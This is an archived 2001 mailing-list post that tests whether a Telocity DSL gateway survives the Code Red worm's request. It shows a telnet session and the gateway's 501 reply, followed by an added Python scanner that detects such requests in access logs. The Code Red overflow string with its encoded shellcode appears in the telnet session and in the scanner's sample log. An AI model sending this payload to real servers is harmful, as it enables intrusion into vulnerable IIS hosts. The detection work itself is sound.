code red & telocity gateway

From: Emre Yildirin (emreat_private)
Date: Tue Aug 07 2001 - 22:20:00 PDT


    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: RIPEMD160
    
    
    Hi folks,
    
    Lately I had to reset my Telocity/Direct TV DSL gateway many times.  I 
    thought it had something to do with code red so I started playing around with 
    it.  Just like the Cisco DSL routers, the Telocity gateway has a web 
    interface.  It lets you check connection status and stats on the gateway, but 
    won't let you change any configuration.  It looks like the Telocity x2 model 
    does not suffer from the issue that most of Cisco's DSL routers suffer from.  
    After issuing the same request that code red sends out, my Telocity gateway 
    stayed running.
    
    $ telnet 12.34.56.78 80
    Trying 12.34.56.78...
    Connected to 12.34.56.78.
    Escape character is '^]'.
    GET 
    /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 
     HTTP/1.0
    HTTP/1.0 501 Not Implemented
    Connection: close
    Server: Gateway WindWeb/1.1
    Date: THU JAN 01 14:42:47 1970
    Content-Type: text/html
    WWW-Authenticate: Basic realm="Gateway"
    
    Telocity Expressway Web Server Error Report: V1.1<HR>
    <H1>Server Error: 501 Not Implemented</H1>
    Operating System Error Nr:3997700: errno = 0x3d0004 <P><HR><H2>No RPM for 
    this combination of URL and method</H2><P><HR>please mail problems to 
    supportat_private <A HREF="mailto:supportat_private"><ADDRESS> Telocity 
    Communications Inc. 10355 N. De Anza Blvd. San Jose, CA, 
    95014-2027</ADDRESS></A>
    Connection closed by foreign host.
    
    
    12.34.56.78 is my gateway's IP.  If the gateway was vulnerable (which it's 
    not obviously) this would not be an issue, since it only accepts connection 
    to port 80 from certain IP addresses (like the DSL IP).  I'm not sure if it 
    accepts only the IPs it issues the DSL user, or IPs from the *.telocity.net 
    network.  If that is the case, then this would suck.  I couldn't test the old 
    model (x1) which is the boxy beige box, so if anyone has one of those please 
    tell me if that one is vulnerable.
    
    Anyway, just my $0.02 :-)
    
    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.0.6 (NetBSD) 
    Comment: http://network.asper.org/emre-dsa.asc
    
    iD8DBQE7cMwG28cbRfnkodERA8XVAJ98cLrzy5CwxVwzXly233RrnRGzTwCgrhk1
    qGsnTdeDAJHMphSWKcuJoJM=
    =6ezu
    -----END PGP SIGNATURE-----
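
As an added example, not part of the original post and not code from Telocity or the gateway, here is a small Python scanner that flags the Code Red request shape shown above (a GET for /default.ida whose query carries a run of %uXXXX escapes) in NCSA-format web-server access logs, and records how the server answered, so a 501 like the gateway's stands out from a 200 on a host that actually processed the request. The log lines, source addresses and the threshold of eight %u escapes are constructed assumptions; the regexes are mine, not any vendor's signature.

```python
import re
from collections import Counter

# Constructed sample access-log lines (NCSA combined format); not from the post.
# The first line reuses the request query quoted in the message above, with the
# long run of filler X characters shortened.
SAMPLE_LOG = """\
10.0.0.9 - - [07/Aug/2001:22:10:03 -0700] "GET /default.ida?XXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 501 312 "-" "-"
10.0.0.10 - - [07/Aug/2001:22:11:45 -0700] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/4.0"
10.0.0.11 - - [07/Aug/2001:22:12:01 -0700] "GET /default.ida HTTP/1.0" 404 209 "-" "-"
"""

# Minimal NCSA combined-format parser: source, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Code Red's request targets /default.ida; its query is filler followed by
# %uXXXX ("wide" percent-encoding, which IIS accepted) carrying the payload.
IDA_RE = re.compile(r'^/default\.ida(?:\?|$)', re.IGNORECASE)
WIDE_ESCAPE_RE = re.compile(r'%u[0-9a-fA-F]{4}')

# Assumed threshold: a benign request carries no %u escapes at all, so a
# handful is already suspicious; eight keeps the rule clear of noise.
WIDE_ESCAPE_THRESHOLD = 8


def classify_request(path):
    """Return 'code_red_probe', 'ida_request' or None for one request path."""
    if not IDA_RE.match(path):
        return None
    if len(WIDE_ESCAPE_RE.findall(path)) >= WIDE_ESCAPE_THRESHOLD:
        return "code_red_probe"
    return "ida_request"


def scan_log(text):
    """Parse each log line and return a finding dict for every .ida request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        kind = classify_request(m.group("path"))
        if kind is None:
            continue
        findings.append({
            "source": m.group("ip"),
            "time": m.group("ts"),
            "kind": kind,
            # The response code tells you how the server handled it:
            # 501/404 means the request was refused, 200 means it was processed.
            "status": int(m.group("status")),
            "wide_escapes": len(WIDE_ESCAPE_RE.findall(m.group("path"))),
        })
    return findings


def summarize(findings):
    """Count findings per (source, kind, status) for a quick triage view."""
    return Counter((f["source"], f["kind"], f["status"]) for f in findings)


if __name__ == "__main__":
    for key, n in summarize(scan_log(SAMPLE_LOG)).items():
        print(key, n)
```

Run it over a real access log by passing the file's contents to scan_log; anything classified as code_red_probe with a 200 status is the case worth investigating, since it means the server accepted and processed the request rather than rejecting it the way the gateway above did.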
    



    This archive was generated by hypermail 2b30 : Tue Aug 07 2001 - 17:44:51 PDT